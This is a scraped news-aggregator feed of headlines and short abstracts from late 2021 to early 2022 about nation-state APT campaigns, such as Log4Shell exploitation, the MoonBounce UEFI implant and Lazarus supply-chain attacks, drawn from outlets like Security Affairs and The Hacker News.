SentinelOne allegedly stumbled across an Iranian threat actor, dubbed TunnelVision, exploiting the Log4j vulnerability on unpatched VMware Horizon servers to deploy ransomware. The group exploited multiple one-day flaws, such as FortiOS (CVE-2018-13379) and Exchange (ProxyShell). The TTPs of TunnelVisio ...Cyware Alerts - Hacker News
February 18, 2022
Iran-linked TunnelVision APT is actively exploiting the Log4j vulnerability Full Text
Abstract
Iran-linked TunnelVision APT group is actively exploiting the Log4j vulnerability to deploy ransomware on unpatched VMware Horizon servers. Researchers from SentinelOne have observed the potentially destructive Iran-linked APT group TunnelVision...Security Affairs
February 18, 2022
Iran-linked TunnelVision APT is actively exploiting the Log4j vulnerability Full Text
Abstract
SentinelOne observed the potentially destructive Iran-linked APT group TunnelVision actively exploiting the Log4j vulnerability to deploy ransomware on unpatched VMware Horizon servers.Security Affairs
February 17, 2022
Deciphering Moses Staff APT’s Persistent Attacks Against Israeli Organizations Full Text
Abstract
As per a new update shared by Cybereason Nocturnus Team, the APT group has made improvements in tactics and techniques to target several organizations located across Italy, India, Germany, China, Turkey, the UAE, and the U.S.Cyware Alerts - Hacker News
February 15, 2022
TA2541: APT Has Been Shooting RATs at Aviation for Years Full Text
Abstract
Since 2017, the attacker has flung simple off-the-shelf malware in malicious email campaigns aimed at aviation, aerospace, transportation and defense.Threatpost
February 11, 2022
Molerats APT Strikes Again with New NimbleMamba Malware Full Text
Abstract
Researchers from Proofpoint spotted a new phishing campaign that targeted multiple Middle Eastern governments, foreign-policy think tanks, and a state-affiliated airline with the new NimbleMamba trojan. NimbleMamba is believed to share some similarities with Molerats’ previous executable LastConn ...Cyware Alerts - Hacker News
February 09, 2022
Russian APT Hackers Used COVID-19 Lures to Target European Diplomats Full Text
Abstract
The Russia-linked threat actor known as APT29 targeted European diplomatic missions and Ministries of Foreign Affairs as part of a series of spear-phishing campaigns mounted in October and November 2021. According to ESET's T3 2021 Threat Report shared with The Hacker News, the intrusions paved the way for the deployment of Cobalt Strike Beacon on compromised systems, followed by leveraging the foothold to drop additional malware for gathering information about the hosts and other machines in the same network. Also tracked under the names The Dukes, Cozy Bear, and Nobelium, the advanced persistent threat group is an infamous cyber-espionage group that has been active for more than a decade, with its attacks targeting Europe and the U.S., before it gained widespread attention for the supply‐chain compromise of SolarWinds, leading to further infections in several downstream entities, including U.S. government agencies in 2020. The spear-phishing attacks commenced with a COVIThe Hacker News
February 8, 2022
Chinese APT Actor Stayed Hidden for 250 Days Full Text
Abstract
The xPack backdoor allowed the threat actors to remotely run WMI commands, interact with SMB shares to transfer files, and browse the web by using the backdoor as a proxy to hide their IP addresses.Cyware Alerts - Hacker News
February 7, 2022
MuddyWater APT Associated with Recent Attacks on Turkey Full Text
Abstract
Iranian MuddyWater APT has reportedly launched fresh attacks targeting users in the Turkish government and other private organizations in the country. Hackers lure victims via maldocs that masquerade as genuine documents from the Turkish Health and Interior Ministries. Targeted organizatio ...Cyware Alerts - Hacker News
February 7, 2022
APT27 Group Targets German Organizations with HyperBro Full Text
Abstract
Researchers warned against ongoing attacks by the China-backed APT27 hacking group, which has been targeting commercial organizations in Germany. The goal of the campaign seems to be stealing sensitive information and targeting victims' customers in supply chain attacks. The intelligence agen ...Cyware Alerts - Hacker News
February 7, 2022
Russian Gamaredon APT has been targeting Ukraine since October Full Text
Abstract
Russia-linked APT group Gamaredon is behind spear-phishing attacks against Ukrainian entities and organizations since October 2021. Russia-linked cyberespionage group Gamaredon (aka Armageddon, Primitive Bear, and ACTINIUM) is behind the spear-phishing...Security Affairs
February 4, 2022
Russia-linked Gamaredon APT targeted a western government entity in Ukraine Full Text
Abstract
The Russia-linked Gamaredon APT group attempted to compromise an unnamed Western government entity in Ukraine. Palo Alto Networks' Unit 42 reported that the Russia-linked Gamaredon APT group attempted to compromise an unnamed Western government entity...Security Affairs
February 3, 2022
Antlion APT group used a custom backdoor that allowed them to fly under the radar for months Full Text
Abstract
A China-linked APT group tracked as Antlion used a custom backdoor called xPack that was undetected for months. A China-linked APT group tracked as Antlion is using a custom backdoor called xPack in attacks aimed at financial organizations and manufacturing...Security Affairs
February 2, 2022
Experts warn of a spike in APT35 activity and a possible link to Memento ransomware op Full Text
Abstract
The Cybereason Nocturnus Team reported a spike in the activity of the Iran-linked APT group APT35 (aka Phosphorus or Charming Kitten). The Cybereason Nocturnus Team observed a spike in the activity of the Iran-linked APT group APT35 (aka...Security Affairs
February 01, 2022
Cyberspies linked to Memento ransomware use new PowerShell malware Full Text
Abstract
An Iranian state-backed hacking group tracked as APT35 (aka Phosphorus or Charming Kitten) is now deploying a new backdoor called PowerLess and developed using PowerShell.BleepingComputer
February 1, 2022
Iran-linked MuddyWater APT group campaign targets Turkish entities Full Text
Abstract
The Iran-linked MuddyWater APT group is targeting private Turkish organizations and governmental institutions. Researchers from Cisco Talos have uncovered a cyber espionage campaign carried out by the Iran-linked MuddyWater APT group (aka SeedWorm and TEMP.Zagros) and...Security Affairs
January 28, 2022
Lazarus APT Uses Windows Update to Spew Malware Full Text
Abstract
The group once again dangled fake job opportunities at engineers in a spear-phishing campaign that used Windows Update as a living-off-the-land technique and GitHub as a C2.Threatpost
January 27, 2022
North Korea-linked Lazarus APT used Windows Update client and GitHub in recent attacks Full Text
Abstract
North Korea-linked Lazarus APT group uses the Windows Update client to deliver malware on Windows systems. North Korea-linked Lazarus APT started using Windows Update to execute the malicious payload and GitHub as a command and control server in recent...Security Affairs
January 27, 2022
Russian APT29 hackers’ stealthy malware undetected for years Full Text
Abstract
Hackers associated with the Russian Federation Foreign Intelligence Service (SVR) continued their incursions on networks of multiple organizations after the SolarWinds supply-chain compromise using two recently discovered sophisticated threats.BleepingComputer
January 26, 2022
German intelligence agency warns of China-linked APT27 targeting commercial organizations Full Text
Abstract
The BfV German domestic intelligence services warn of ongoing attacks carried out by the China-linked APT27 cyberespionage group. The Bundesamt für Verfassungsschutz (BfV) federal domestic intelligence agency warns of ongoing attacks coordinated...Security Affairs
January 26, 2022
German govt warns of APT27 hackers backdooring business networks Full Text
Abstract
The BfV German domestic intelligence services (short for Bundesamt für Verfassungsschutz) warn of ongoing attacks coordinated by the APT27 Chinese-backed hacking group.BleepingComputer
January 25, 2022
Molerats APT Group Targets the Middle East Full Text
Abstract
ThreatLabz exposed cyberespionage group Molerats, which has been leveraging cloud services, such as Google Drive and Dropbox, to host payloads to target the Middle East. The targets picked by the attackers included important members of the banking sector in Palestine, human rights activists/journali ...Cyware Alerts - Hacker News
January 24, 2022
MoleRats APT Launches Spy Campaign on Bankers, Politicians, Journalists Full Text
Abstract
State-sponsored cyberattackers are using Google Drive, Dropbox and other legitimate services to drop spyware on Middle-Eastern targets and exfiltrate data.Threatpost
January 22, 2022
Stealthy firmware bootkit leveraged by APT in targeted attacks Full Text
Abstract
Kaspersky researchers have uncovered the third known case of a firmware bootkit in the wild. Dubbed MoonBounce, this malicious implant is hidden within Unified Extensible Firmware Interface (UEFI) firmware.Help Net Security
January 21, 2022
BlueNoroff APT Group Eyeing Crypto Startups Full Text
Abstract
A North Korea-linked APT group has been spotted targeting cryptocurrency startups worldwide with fake MetaMask browser extensions to steal cryptocurrency from users' wallets. The attackers work around a complex infrastructure, including various exploits and malware implants to target victims. Organ ...Cyware Alerts - Hacker News
January 21, 2022
MoonBounce UEFI implant spotted in a targeted APT41 attack Full Text
Abstract
Researchers have spotted China-linked APT41 cyberespionage group using a UEFI implant, dubbed MoonBounce, to maintain persistence. Kaspersky researchers spotted the China-linked APT41 cyberespionage group using a UEFI implant, dubbed MoonBounce,...Security Affairs
January 21, 2022
Molerats APT Targets Users in the Middle East in New Attacks Using .NET Backdoor Full Text
Abstract
ThreatLabz researchers observed several similarities in the C2 communication and .NET payload between this campaign and the previous campaigns attributed to the Molerats APT group.Zscaler
January 20, 2022
New MoonBounce UEFI malware used by APT41 in targeted attacks Full Text
Abstract
Security analysts have discovered and linked MoonBounce, "the most advanced" UEFI firmware implant found so far in the wild, to the Chinese-speaking APT41 hacker group (also known as Winnti).BleepingComputer
January 17, 2022
Kyiv blames Belarus-linked APT UNC1151 for recent cyberattack Full Text
Abstract
Ukrainian government attributes the recent attacks against tens of Ukrainian government websites to Belarusian APT group UNC1151. The government of Kyiv attributes the defacement of tens of Ukrainian government websites to Belarusian APT group UNC1151,...Security Affairs
January 14, 2022
North Korea-linked APT BlueNoroff focuses on crypto theft Full Text
Abstract
The North Korea-linked APT group BlueNoroff has been spotted targeting cryptocurrency startups with fake MetaMask browser extensions. The North Korea-linked APT group BlueNoroff has been spotted targeting cryptocurrency startups with fake MetaMask...Security Affairs
January 13, 2022
North Korean APTs Stole ~$400M in Crypto in 2021 Full Text
Abstract
Meanwhile, EthereumMax got sued over an alleged pump-and-dump scam after using celebs like Floyd Mayweather Jr. & Kim Kardashian to promote EMAX Tokens.Threatpost
January 13, 2022
US Military Ties Prolific MuddyWater Cyberespionage APT to Iran Full Text
Abstract
US Cyber Command linked the group to Iranian intelligence and detailed its multi-pronged, increasingly sophisticated suite of malware tools.Threatpost
January 13, 2022
USCYBERCOM: MuddyWater APT is linked to Iran’s MOIS intelligence Full Text
Abstract
US Cyber Command (USCYBERCOM) has officially linked the Iran-linked MuddyWater APT group to Iran's Ministry of Intelligence and Security (MOIS). USCYBERCOM has officially linked the Iran-linked MuddyWater APT group (aka SeedWorm and TEMP.Zagros)...Security Affairs
January 12, 2022
Iran-linked APT35 group exploits Log4Shell flaw to deploy a new PowerShell backdoor Full Text
Abstract
Iran-linked APT35 group has been observed leveraging the Log4Shell flaw to drop a new PowerShell backdoor. Iran-linked APT35 cyberespionage group (aka 'Charming Kitten' or 'Phosphorus') has been observed leveraging the Log4Shell flaw to drop a new PowerShell...Security Affairs
January 10, 2022
India-linked Patchwork APT infected its own system, revealing its ops Full Text
Abstract
The India-linked threat actor Patchwork infected one of its own computers with its RAT, revealing its operations to researchers. An India-linked threat actor, tracked as Patchwork (aka Dropping Elephant), employed a new variant of the BADNEWS backdoor,...Security Affairs
January 09, 2022
BADNEWS! Patchwork APT Hackers Score Own Goal in Recent Malware Attacks Full Text
Abstract
Threat hunters have shed light on the tactics, techniques, and procedures embraced by an Indian-origin hacking group called Patchwork as part of a renewed campaign that commenced in late November 2021, targeting Pakistani government entities and individuals with a research focus on molecular medicine and biological science. "Ironically, all the information we gathered was possible thanks to the threat actor infecting themselves with their own [remote access trojan], resulting in captured keystrokes and screenshots of their own computer and virtual machines," Malwarebytes Threat Intelligence Team said in a report published on Friday. Prominent victims that were successfully infiltrated include Pakistan's Ministry of Defense, National Defence University of Islamabad, Faculty of Bio-Sciences at UVAS Lahore, International Center for Chemical and Biological Sciences (ICCBS), H.E.J. Research Institute of Chemistry, and the Salim Habib University (SBU). Believed to have bThe Hacker News
January 9, 2022
APT Groups Registering C2 Domains Way Before Attacks Full Text
Abstract
Recent research claims that 22.3% of aged domain owners may return dangerous outcomes, as these dormant domains are increasingly being misused by attackers.Cyware Alerts - Hacker News
January 6, 2022
North Korea-linked Konni APT targets Russian diplomatic bodies Full Text
Abstract
North Korea-linked APT group Konni targets the Russian Federation's Ministry of Foreign Affairs (MID) with new versions of its malware implants. Security researchers at Cluster25 uncovered a recent campaign carried out by the North Korea-linked Konni APT group...Security Affairs
January 3, 2022
BlackTech APT Pulls Out New Flagpro Malware To Target Japan and Others Full Text
Abstract
NTT Security exposed the China-linked BlackTech espionage group using new Flagpro malware in recent attacks against Japanese companies in the media, defense, and communications industries. The attack begins with a spear-phishing email, which is customized for the targeted organizations. Firms are a ...Cyware Alerts - Hacker News
December 30, 2021
Chinese APT Hackers Used Log4Shell Exploit to Target Academic Institution Full Text
Abstract
A never-before-seen China-based targeted intrusion adversary dubbed Aquatic Panda has been observed leveraging critical flaws in the Apache Log4j logging library as an access vector to perform various post-exploitation operations, including reconnaissance and credential harvesting on targeted systems. Cybersecurity firm CrowdStrike said the infiltration, which was ultimately foiled, was aimed at an unnamed "large academic institution." The state-sponsored group is believed to have been operating since mid-2020 in pursuit of intelligence collection and industrial espionage, with its attacks primarily directed against companies in the telecommunications, technology, and government sectors. The attempted intrusion exploited the newly discovered Log4Shell flaw (CVE-2021-44228, CVSS score: 10.0) to gain access to a vulnerable instance of the VMware Horizon desktop and app virtualization product, followed by running a series of malicious commands orchestrated to fetch thrThe Hacker News
December 30, 2021
China-linked APT group Aquatic Panda leverages Log4Shell in recent attack Full Text
Abstract
China-linked APT group Aquatic Panda is exploiting the Log4Shell vulnerability to compromise a large academic institution. China-linked cyberespionage group Aquatic Panda was spotted exploiting the Log4Shell vulnerability (CVE-2021-44228) in an attack...Security Affairs
December 28, 2021
DoubleFeature, post-exploitation dashboard used by Equation Group APT Full Text
Abstract
Researchers analyzed the DoubleFeature logging tool of DanderSpritz Framework that was used by the Equation Group APT group. Check Point researchers have published a detailed analysis of the DoubleFeature tool used to log post-exploitation activities...Security Affairs
December 22, 2021
FBI Warning: APT Groups Exploit Zero-Day in Zoho Application Full Text
Abstract
The FBI warned Zoho users of an authentication bypass flaw in Zoho’s ManageEngine ServiceDesk Plus being exploited by APT actors since at least October 2021. Searching on the Shodan search engine for exposed ManageEngine Desktop Central revealed 2,980 systems that might be at risk of attack. ...Cyware Alerts - Hacker News
December 21, 2021
FBI Sees APTs Exploiting Recent ManageEngine Desktop Central Vulnerability Full Text
Abstract
The Federal Bureau of Investigation (FBI) has released an alert regarding the exploitation of a recent vulnerability, tracked as CVE-2021-44515, in Zoho’s ManageEngine Desktop Central product.Security Week
December 20, 2021
Alleged APT implanted a backdoor in the network of a US federal agency Full Text
Abstract
An alleged APT group planted a backdoor in the network of a U.S. federal government commission associated with international rights. Experts spotted a backdoor in the network of an unnamed U.S. federal government commission associated with international...Security Affairs
December 15, 2021
Iran-linked Seedworm APT targets Telecoms organizations across the Middle East and Asia Full Text
Abstract
Researchers uncovered a new Seedworm campaign targeting telecommunication and IT service providers in the Middle East and Asia. Iran-linked APT group Seedworm (aka MERCURY, MuddyWater, TEMP.Zagros, or Static Kitten) is behind a new cyberespionage...Security Affairs
December 9, 2021
SideCopy APT Targets Indian and Afghan Governments Full Text
Abstract
Researchers discovered that the SideCopy APT group targeted government officials in India and Afghanistan via the new AuTo data stealer for cyberespionage. Hackers use ActionRAT and AuTo Stealer malware in this campaign. Government entities are suggested to invest more in security and stay vig ...Cyware Alerts - Hacker News
December 7, 2021
Microsoft seized 42 domains used by the China-linked APT15 cyberespionage group Full Text
Abstract
Microsoft seized dozens of malicious domains used by the China-linked APT15 group to target organizations worldwide. Microsoft announced to have obtained a court warrant that allowed it to seize 42 domains used by a China-linked APT15 group (aka Nickel,...Security Affairs
December 7, 2021
Nobelium continues to target organizations worldwide with custom malware Full Text
Abstract
Russia-linked Nobelium APT group is using a new custom malware dubbed Ceeloader in attacks against organizations worldwide. Mandiant researchers have identified two distinct clusters of activity, tracked as UNC3004 and UNC2652, that were associated with...Security Affairs
December 06, 2021
Microsoft seizes sites used by APT15 Chinese state hackers Full Text
Abstract
Microsoft seized today dozens of malicious sites used by the Nickel China-based hacking group to target organizations in the US and 28 other countries worldwide.BleepingComputer
December 6, 2021
Nobelium APT targets French orgs, French ANSSI agency warns Full Text
Abstract
The French cyber-security agency ANSSI said that the Russia-linked Nobelium APT group has been targeting French organizations since February 2021. The French national cybersecurity agency ANSSI (Agence Nationale de la Sécurité des Systèmes d'Information)...Security Affairs
December 6, 2021
RTF Template Injection Technique Becomes Popular Among APT Groups Full Text
Abstract
Proofpoint identified three state-sponsored threat actors from India, Russia, and China adopting RTF template injection methods in their phishing campaigns. The adoption of this technique has made attacks from the group much harder to detect and prevent. Therefore, organizations are suggested to d ...Cyware Alerts - Hacker News
December 4, 2021
Determined APT is exploiting ManageEngine ServiceDesk Plus vulnerability Full Text
Abstract
An APT group is leveraging a critical vulnerability (CVE-2021-44077) in Zoho ManageEngine ServiceDesk Plus to compromise organizations in a variety of sectors, including defense and tech.Help Net Security
December 1, 2021
New RTF Template Inject technique used by APT groups in recent attacks Full Text
Abstract
Nation-state actors from China, India, and Russia, were spotted using a novel RTF template injection technique in recent attacks. APT groups from China, India, and Russia have used a new RTF (rich text format) template injection technique in recent...Security Affairs
November 30, 2021
WIRTE APT group has been targeting the Middle East since at least 2019 Full Text
Abstract
A threat actor named WIRTE targets government, diplomatic entities, military organizations, law firms, and financial institutions in the Middle East. Cybersecurity researchers from Kaspersky have detailed the activity of a threat actor named WIRTE that...Security Affairs
November 29, 2021
ScarCruft APT Mounts Desktop/Mobile Double-Pronged Spy Attacks Full Text
Abstract
The North Korea-linked group is deploying the Chinotto spyware backdoor against dissidents, journalists and other politically relevant individuals in South Korea.Threatpost
November 29, 2021
APT37 targets journalists with Chinotto multi-platform malware Full Text
Abstract
North Korean state hacking group APT37 targets South Korean journalists, defectors, and human rights activists in watering hole, spear-phishing emails, and smishing attacks delivering malware dubbed Chinotto capable of infecting Windows and Android devices.BleepingComputer
November 26, 2021
APT C-23 Targeting Android Users in Middle East with Spyware Full Text
Abstract
Sophos is warning against an evolved version of an Android spyware, allegedly used by an APT group called C-23, targeting individuals in the Middle East. It spreads via a download link in a text message sent to the target’s phone. Users are requested to always update Android OS and applications v ...Cyware Alerts - Hacker News
November 24, 2021
APT C-23 Hackers Using New Android Spyware Variant to Target Middle East Users Full Text
Abstract
A threat actor known for striking targets in the Middle East has evolved its Android spyware yet again with enhanced capabilities that allow it to be stealthier and more persistent while passing off as seemingly innocuous app updates to stay under the radar. The new variants have "incorporated new features into their malicious apps that make them more resilient to actions by users, who might try to remove them manually, and to security and web hosting companies that attempt to block access to, or shut down, their command-and-control server domains," Sophos threat researcher Pankaj Kohli said in a report published Tuesday. Also known by the monikers VAMP, FrozenCell, GnatSpy, and Desert Scorpion, the mobile spyware has been a preferred tool of choice for the APT-C-23 threat group since at least 2017, with successive iterations featuring extended surveillance functionality to vacuum files, images, contacts and call logs, read notifications from messaging apps, rThe Hacker News
November 18, 2021
US, UK and Australia warn of Iran-linked APTs exploiting Fortinet, Microsoft Exchange flaws Full Text
Abstract
U.S., U.K. and Australia warn that Iran-linked APT groups are exploiting Fortinet and Microsoft Exchange flaws to target critical infrastructure. A joint advisory released by government agencies (the FBI, the Cybersecurity and Infrastructure Security...Security Affairs
November 17, 2021
Iran-linked APT groups continue to evolve Full Text
Abstract
The researchers at Microsoft Threat Intelligence Center (MSTIC) are warning of increasingly sophisticated operations carried out by Iranian threat actors. The Microsoft Threat Intelligence Center (MSTIC) shared the results of their analysis on the evolution...Security Affairs
November 12, 2021
Lazarus is Back at it Again Full Text
Abstract
The infamous North Korea state-sponsored Lazarus APT was recently found targeting IT supply chains. Now, the group has been discovered attempting to hack security researchers again.Cyware Alerts - Hacker News
November 11, 2021
An Iranian APT Targets Telcos, ISPs with Upgraded Malware Full Text
Abstract
Lyceum is targeting ISPs and telecommunication operators in Israel, Tunisia, Morocco, and Saudi Arabia. It also attacked a ministry of foreign affairs in Africa. Lyceum uses credential stuffing and brute-force techniques as initial attack vectors. Since its launch, the group has tried and stayed ah ...Cyware Alerts - Hacker News
November 6, 2021
BlackBerry report highlights initial access broker providing entry to StrongPity APT, MountLocker and Phobos ransomware gangs Full Text
Abstract
A new report from BlackBerry has uncovered an initial access broker called "Zebra2104" that has connections to three malicious cybercriminal groups, some of which are involved in ransomware and phishing.ZDNet
November 5, 2021
Ukraine intelligence doxed 5 FSB Officers that are members of Gamaredon APT Group Full Text
Abstract
Ukraine's premier law enforcement and counterintelligence revealed the real identities of five FSB members behind the Gamaredon cyberespionage group. Ukraine's premier law enforcement and counterintelligence disclosed the real identities of five...Security Affairs
October 30, 2021
Lazarus APT Group Enters the Supply Chain Attack Game Full Text
Abstract
Kaspersky revealed two separate supply chain attacks by Lazarus Group aimed at an IT asset monitoring solution vendor, a South Korean think tank, and the defense industry. Hackers use a Racket downloader (signed with a stolen certificate) in the infection chain. Organizations must stay alert and...Cyware Alerts - Hacker News
October 27, 2021
North Korea-linked Lazarus APT targets the IT supply chain Full Text
Abstract
North Korea-linked Lazarus APT group is extending its operations and has started targeting the IT supply chain. North Korea-linked Lazarus APT group is now also targeting the IT supply chain, researchers from Kaspersky Lab warn. The activity...Security Affairs
October 26, 2021
APT trends report released for Q3 2021 Full Text
Abstract
While the TTPs of some threat actors remain consistent over time, relying heavily on social engineering to target organizations or individuals, others refresh their toolsets and extend their scope.Kaspersky Labs
October 25, 2021
Microsoft Defender ATP adds live response for Linux and macOS Full Text
Abstract
Microsoft has announced the addition of new live macOS and Linux response capabilities to Defender for Endpoint, the enterprise version of Redmond's Windows 10 Defender antivirus.BleepingComputer
October 25, 2021
Russia-linked Nobelium APT targets orgs in the global IT supply chain Full Text
Abstract
Russia-linked Nobelium APT group has breached at least 14 managed service providers (MSPs) and cloud service providers since May 2021. The SolarWinds security breach was not isolated: the Russia-linked Nobelium APT group has targeted 140 managed service...Security Affairs
October 24, 2021
Telecom Sector Comes Under Attack as New APT Groups Emerge Full Text
Abstract
A new China-linked LightBasin threat actor group emerged as a new threat for telecommunication companies as researchers dug out a string of attacks designed to gather valuable information.Cyware Alerts - Hacker News
October 20, 2021
Geriatric Microsoft Bug Exploited by APT Using Commodity RATs Full Text
Abstract
Disguised as an IT firm, the APT is hitting targets in Afghanistan & India, exploiting a 20-year-old+ Microsoft Office bug that’s as potent as it is ancient.Threatpost
October 20, 2021
Lyceum Group Updates its Arsenal With New Tricks and Tools Full Text
Abstract
The lesser-known Lyceum APT seems to be on a mission to gain a foothold with its re-appearance. The gang has been associated with an attack campaign launched against entities in Tunisia. Similarities between Lyceum and the infamous DNSpionage campaign, a cluster of activity linked to the...Cyware Alerts - Hacker News
October 19, 2021
Fresh APT Harvester Reaps Telco, Government Data Full Text
Abstract
The group is likely nation-state-backed and is mounting an ongoing spy campaign using custom malware and stealthy tactics.Threatpost
October 19, 2021
Lyceum APT Returns, This Time Targeting Tunisian Firms Full Text
Abstract
The APT, which targets Middle-Eastern energy firms & telecoms, has been relatively quiet since its exposure but not entirely silent. It’s kept up attacks through 2021 and is working on retooling its arsenal yet again.Threatpost
October 16, 2021
Russia-Linked TA505 targets financial institutions in a new malspam campaign Full Text
Abstract
Russia-linked TA505 group leverages a lightweight Office file to spread malware in a campaign, tracked as MirrorBlast, aimed at financial institutions. Russia-linked APT group TA505 (aka Evil Corp) is leveraging a lightweight Office file in a new malware...Security Affairs
October 13, 2021
APT28 Launches Spearphishing Campaign Against Gmail Users: Google Warns Full Text
Abstract
Google warned against phishing attempts by APT28 impacting nearly 14,000 Gmail users, especially activists, journalists, and government officials as they are the key targets of state-sponsored hacks. However, there were no confirmed reports of compromised Gmail accounts.Cyware Alerts - Hacker News
October 13, 2021
Chinese APT IronHusky use Win zero-day in recent wave of attacks Full Text
Abstract
A Chinese-speaking hacking group exploited a Windows zero-day vulnerability in a wave of attacks on defense and IT businesses. A Chinese-speaking hacking group exploited a zero-day vulnerability in the Windows Win32k kernel driver to deploy a new remote...Security Affairs
October 12, 2021
New Iranian APT Targets Aerospace and Telecoms in Western Countries Full Text
Abstract
A cyberespionage operation by MalKamak, an Iran-based hacker group, is targeting aerospace and telecom firms based in the Middle East, Russia, the U.S., and Europe. MalKamak, which uses ShellClient RAT, has targeted only a small number of targets since its alleged inception in 2018. Security team...Cyware Alerts - Hacker News
October 12, 2021
Research Links Multiple Attack Campaigns to APT41 Group Full Text
Abstract
Blackberry revealed three phishing schemes by APT41 that were targeting multiple sectors in India using COVID-19-themed phishing baits. Some of the phishing emails included information related to the latest income tax legislation targeting residents not living in India. Security teams need to...Cyware Alerts - Hacker News
October 11, 2021
Iran-linked DEV-0343 APT target US and Israeli defense technology firms Full Text
Abstract
DEV-0343: Iran-linked threat actors are targeting US and Israeli defense technology companies leveraging password spraying attacks. Researchers at Microsoft Threat Intelligence Center (MSTIC) and Microsoft Digital Security Unit (DSU) uncovered a malicious...Security Affairs
October 9, 2021
Google Says Russian APT Targeting Journalists, Politicians Full Text
Abstract
Some 14,000 Google users were warned of being suspected targets of Russian government-backed threat actors. Post that, the tech giant announced cybersecurity updates - particularly for email accounts of high-profile users.Gov Info Security
October 8, 2021
Google warns of APT28 attack attempts against 14,000 Gmail users Full Text
Abstract
Google warned more than 14,000 Gmail users that they have been the target of nation-state spear-phishing campaigns. On Wednesday, Google announced that it had warned approximately 14,000 Gmail users that they had been targeted by nation-state hackers. Shane...Security Affairs
October 7, 2021
Operation GhostShell: MalKamak APT targets aerospace and telco firms Full Text
Abstract
Operation GhostShell: Threat actors used ShellClient malware in cyberespionage campaigns aimed at companies in the aerospace and telecommunications sectors. Hackers use stealthy ShellClient malware against aerospace and telco firms. Cybereason Nocturnus...Security Affairs
October 04, 2021
A New APT Hacking Group Targeting Fuel, Energy, and Aviation Industries Full Text
Abstract
A previously undocumented threat actor has been identified as behind a string of attacks targeting fuel, energy, and aviation production industries in Russia, the U.S., India, Nepal, Taiwan, and Japan with the goal of stealing data from compromised networks. Cybersecurity company Positive Technologies dubbed the advanced persistent threat (APT) group ChamelGang — referring to their chameleonic capabilities, including disguising "its malware and network infrastructure under legitimate services of Microsoft, TrendMicro, McAfee, IBM, and Google." "To achieve their goal, the attackers used a trending penetration method—supply chain," the researchers said of one of the incidents investigated by the firm. "The group compromised a subsidiary and penetrated the target company's network through it. Trusted relationship attacks are rare today due to the complexity of their execution. Using this method […], the ChamelGang group was able to achieve its goal a...The Hacker News
October 4, 2021
New APT ChamelGang Targets energy and aviation companies in Russia Full Text
Abstract
ChamelGang APT is a new cyberespionage group that focuses on fuel and energy organizations and the aviation industry in Russia. ChamelGang is a new APT group that was first spotted in March by researchers at security firm Positive Technologies; it targets...Security Affairs
September 28, 2021
FamousSparrow APT Launches Worldwide Attack Campaign Full Text
Abstract
FamousSparrow, a new entrant to the cyberespionage space, is reportedly spying on users across multiple sectors, including government, engineering, legal, and hospitality. It is one of the earliest attackers leveraging Microsoft Exchange ProxyLogon vulnerabilities for its attacks. Its victims ar...Cyware Alerts - Hacker News
September 28, 2021
Russia-linked Nobelium APT group uses custom backdoor to target Windows domains Full Text
Abstract
Microsoft discovered new custom malware, dubbed FoggyWeb, used by the Nobelium cyberespionage group to implant a backdoor in Windows domains. Microsoft Threat Intelligence Center (MSTIC) researchers have discovered a new custom malware, dubbed FoggyWeb...Security Affairs
September 27, 2021
Russian Turla APT Group Deploying New Backdoor on Targeted Systems Full Text
Abstract
State-sponsored hackers affiliated with Russia are behind a new series of intrusions using a previously undocumented implant to compromise systems in the U.S., Germany, and Afghanistan. Cisco Talos attributed the attacks to the Turla advanced persistent threat (APT) group, coining the malware "TinyTurla" for its limited functionality and efficient coding style that allows it to go undetected. Attacks incorporating the backdoor are believed to have occurred since 2020. "This simple backdoor is likely used as a second-chance backdoor to maintain access to the system, even if the primary malware is removed," the researchers said. "It could also be used as a second-stage dropper to infect the system with additional malware." Furthermore, TinyTurla can upload and execute files or exfiltrate sensitive data from the infected machine to a remote server, while also polling the command-and-control (C2) station every five seconds for any new commands. Also k...The Hacker News
September 24, 2021
A New APT Hacker Group Spying On Hotels and Governments Worldwide Full Text
Abstract
A new advanced persistent threat (APT) has been behind a string of attacks against hotels across the world, along with governments, international organizations, engineering companies, and law firms. Slovak cybersecurity firm ESET codenamed the cyber espionage group FamousSparrow, which it said has been active since at least August 2019, with victims located across Africa, Asia, Europe, the Middle East, and the Americas, spanning several countries such as Burkina Faso, Taiwan, France, Lithuania, the U.K., Israel, Saudi Arabia, Brazil, Canada, and Guatemala. Attacks mounted by the group involve exploiting known vulnerabilities in server applications such as SharePoint and Oracle Opera, in addition to the ProxyLogon remote code execution vulnerability in Microsoft Exchange Server that came to light in March 2021, making it the latest threat actor to have had access to the exploit before details of the flaw became public. According to ESET, intrusion exploiting the flaws commen...The Hacker News
September 24, 2021
New FamousSparrow APT group used ProxyLogon exploits in its attacks Full Text
Abstract
Researchers spotted a new cyberespionage group, dubbed FamousSparrow, that used ProxyLogon exploits to target hotels worldwide. Researchers from ESET discovered a new cyberespionage group, tracked as FamousSparrow, that has been targeting hotels...Security Affairs
September 21, 2021
Turla APT group used a new backdoor in attacks against Afghanistan, Germany and the US Full Text
Abstract
Russia-linked cyber espionage group Turla made the headlines again: the APT has employed a new backdoor in a recent wave of attacks. Cisco Talos researchers reported that the Russia-linked Turla APT group recently used a new backdoor, dubbed TinyTurla,...Security Affairs
September 21, 2021
New Warning: APTs are Targeting Zoho ManageEngine Full Text
Abstract
The FBI, CISA, and CGCYBER issued a joint advisory warning against the exploitation of a critical bug in the Zoho ManageEngine ADSelfService Plus software by nation-state actors. Besides applying a patch, organizations are advised to baseline the normal behavior in web server logs to spot a w...Cyware Alerts - Hacker News
September 16, 2021
CISA, FBI: State-Backed APTs May Be Exploiting Critical Zoho Bug Full Text
Abstract
The newly identified bug in a Zoho single sign-on and password management tool has been under active attack since early August.Threatpost
September 16, 2021
Chinese APT Campaign Stole Data from Victim Organization Using Off-the-shelf Hacking and System Management Tools Full Text
Abstract
The threat actors were able to gain their initial access to the victim by exploiting a vulnerability in a web access server. They further used privilege escalation exploits to steal credentials.Tech Target
September 13, 2021
APT-C-36 Updates Its Long-term Spam Campaign Against South American Entities With Commodity RATs Full Text
Abstract
APT-C-36 has been known to send phishing emails to various entities in South America using publicly available remote access tools (RATs). Over time, the threat actor switches from one RAT to another.Trend Micro
September 10, 2021
Grayfly APT uses recently discovered Sidewalk backdoor Full Text
Abstract
Security researchers from Broadcom's Symantec linked a previously undocumented backdoor to the Chinese Grayfly operation. Experts from Broadcom's Symantec linked a previously undocumented backdoor to the Chinese Grayfly operation. In late August,...Security Affairs
September 7, 2021
Golden SAML Attack - APT Hackers Hijacking Active Directory Server Full Text
Abstract
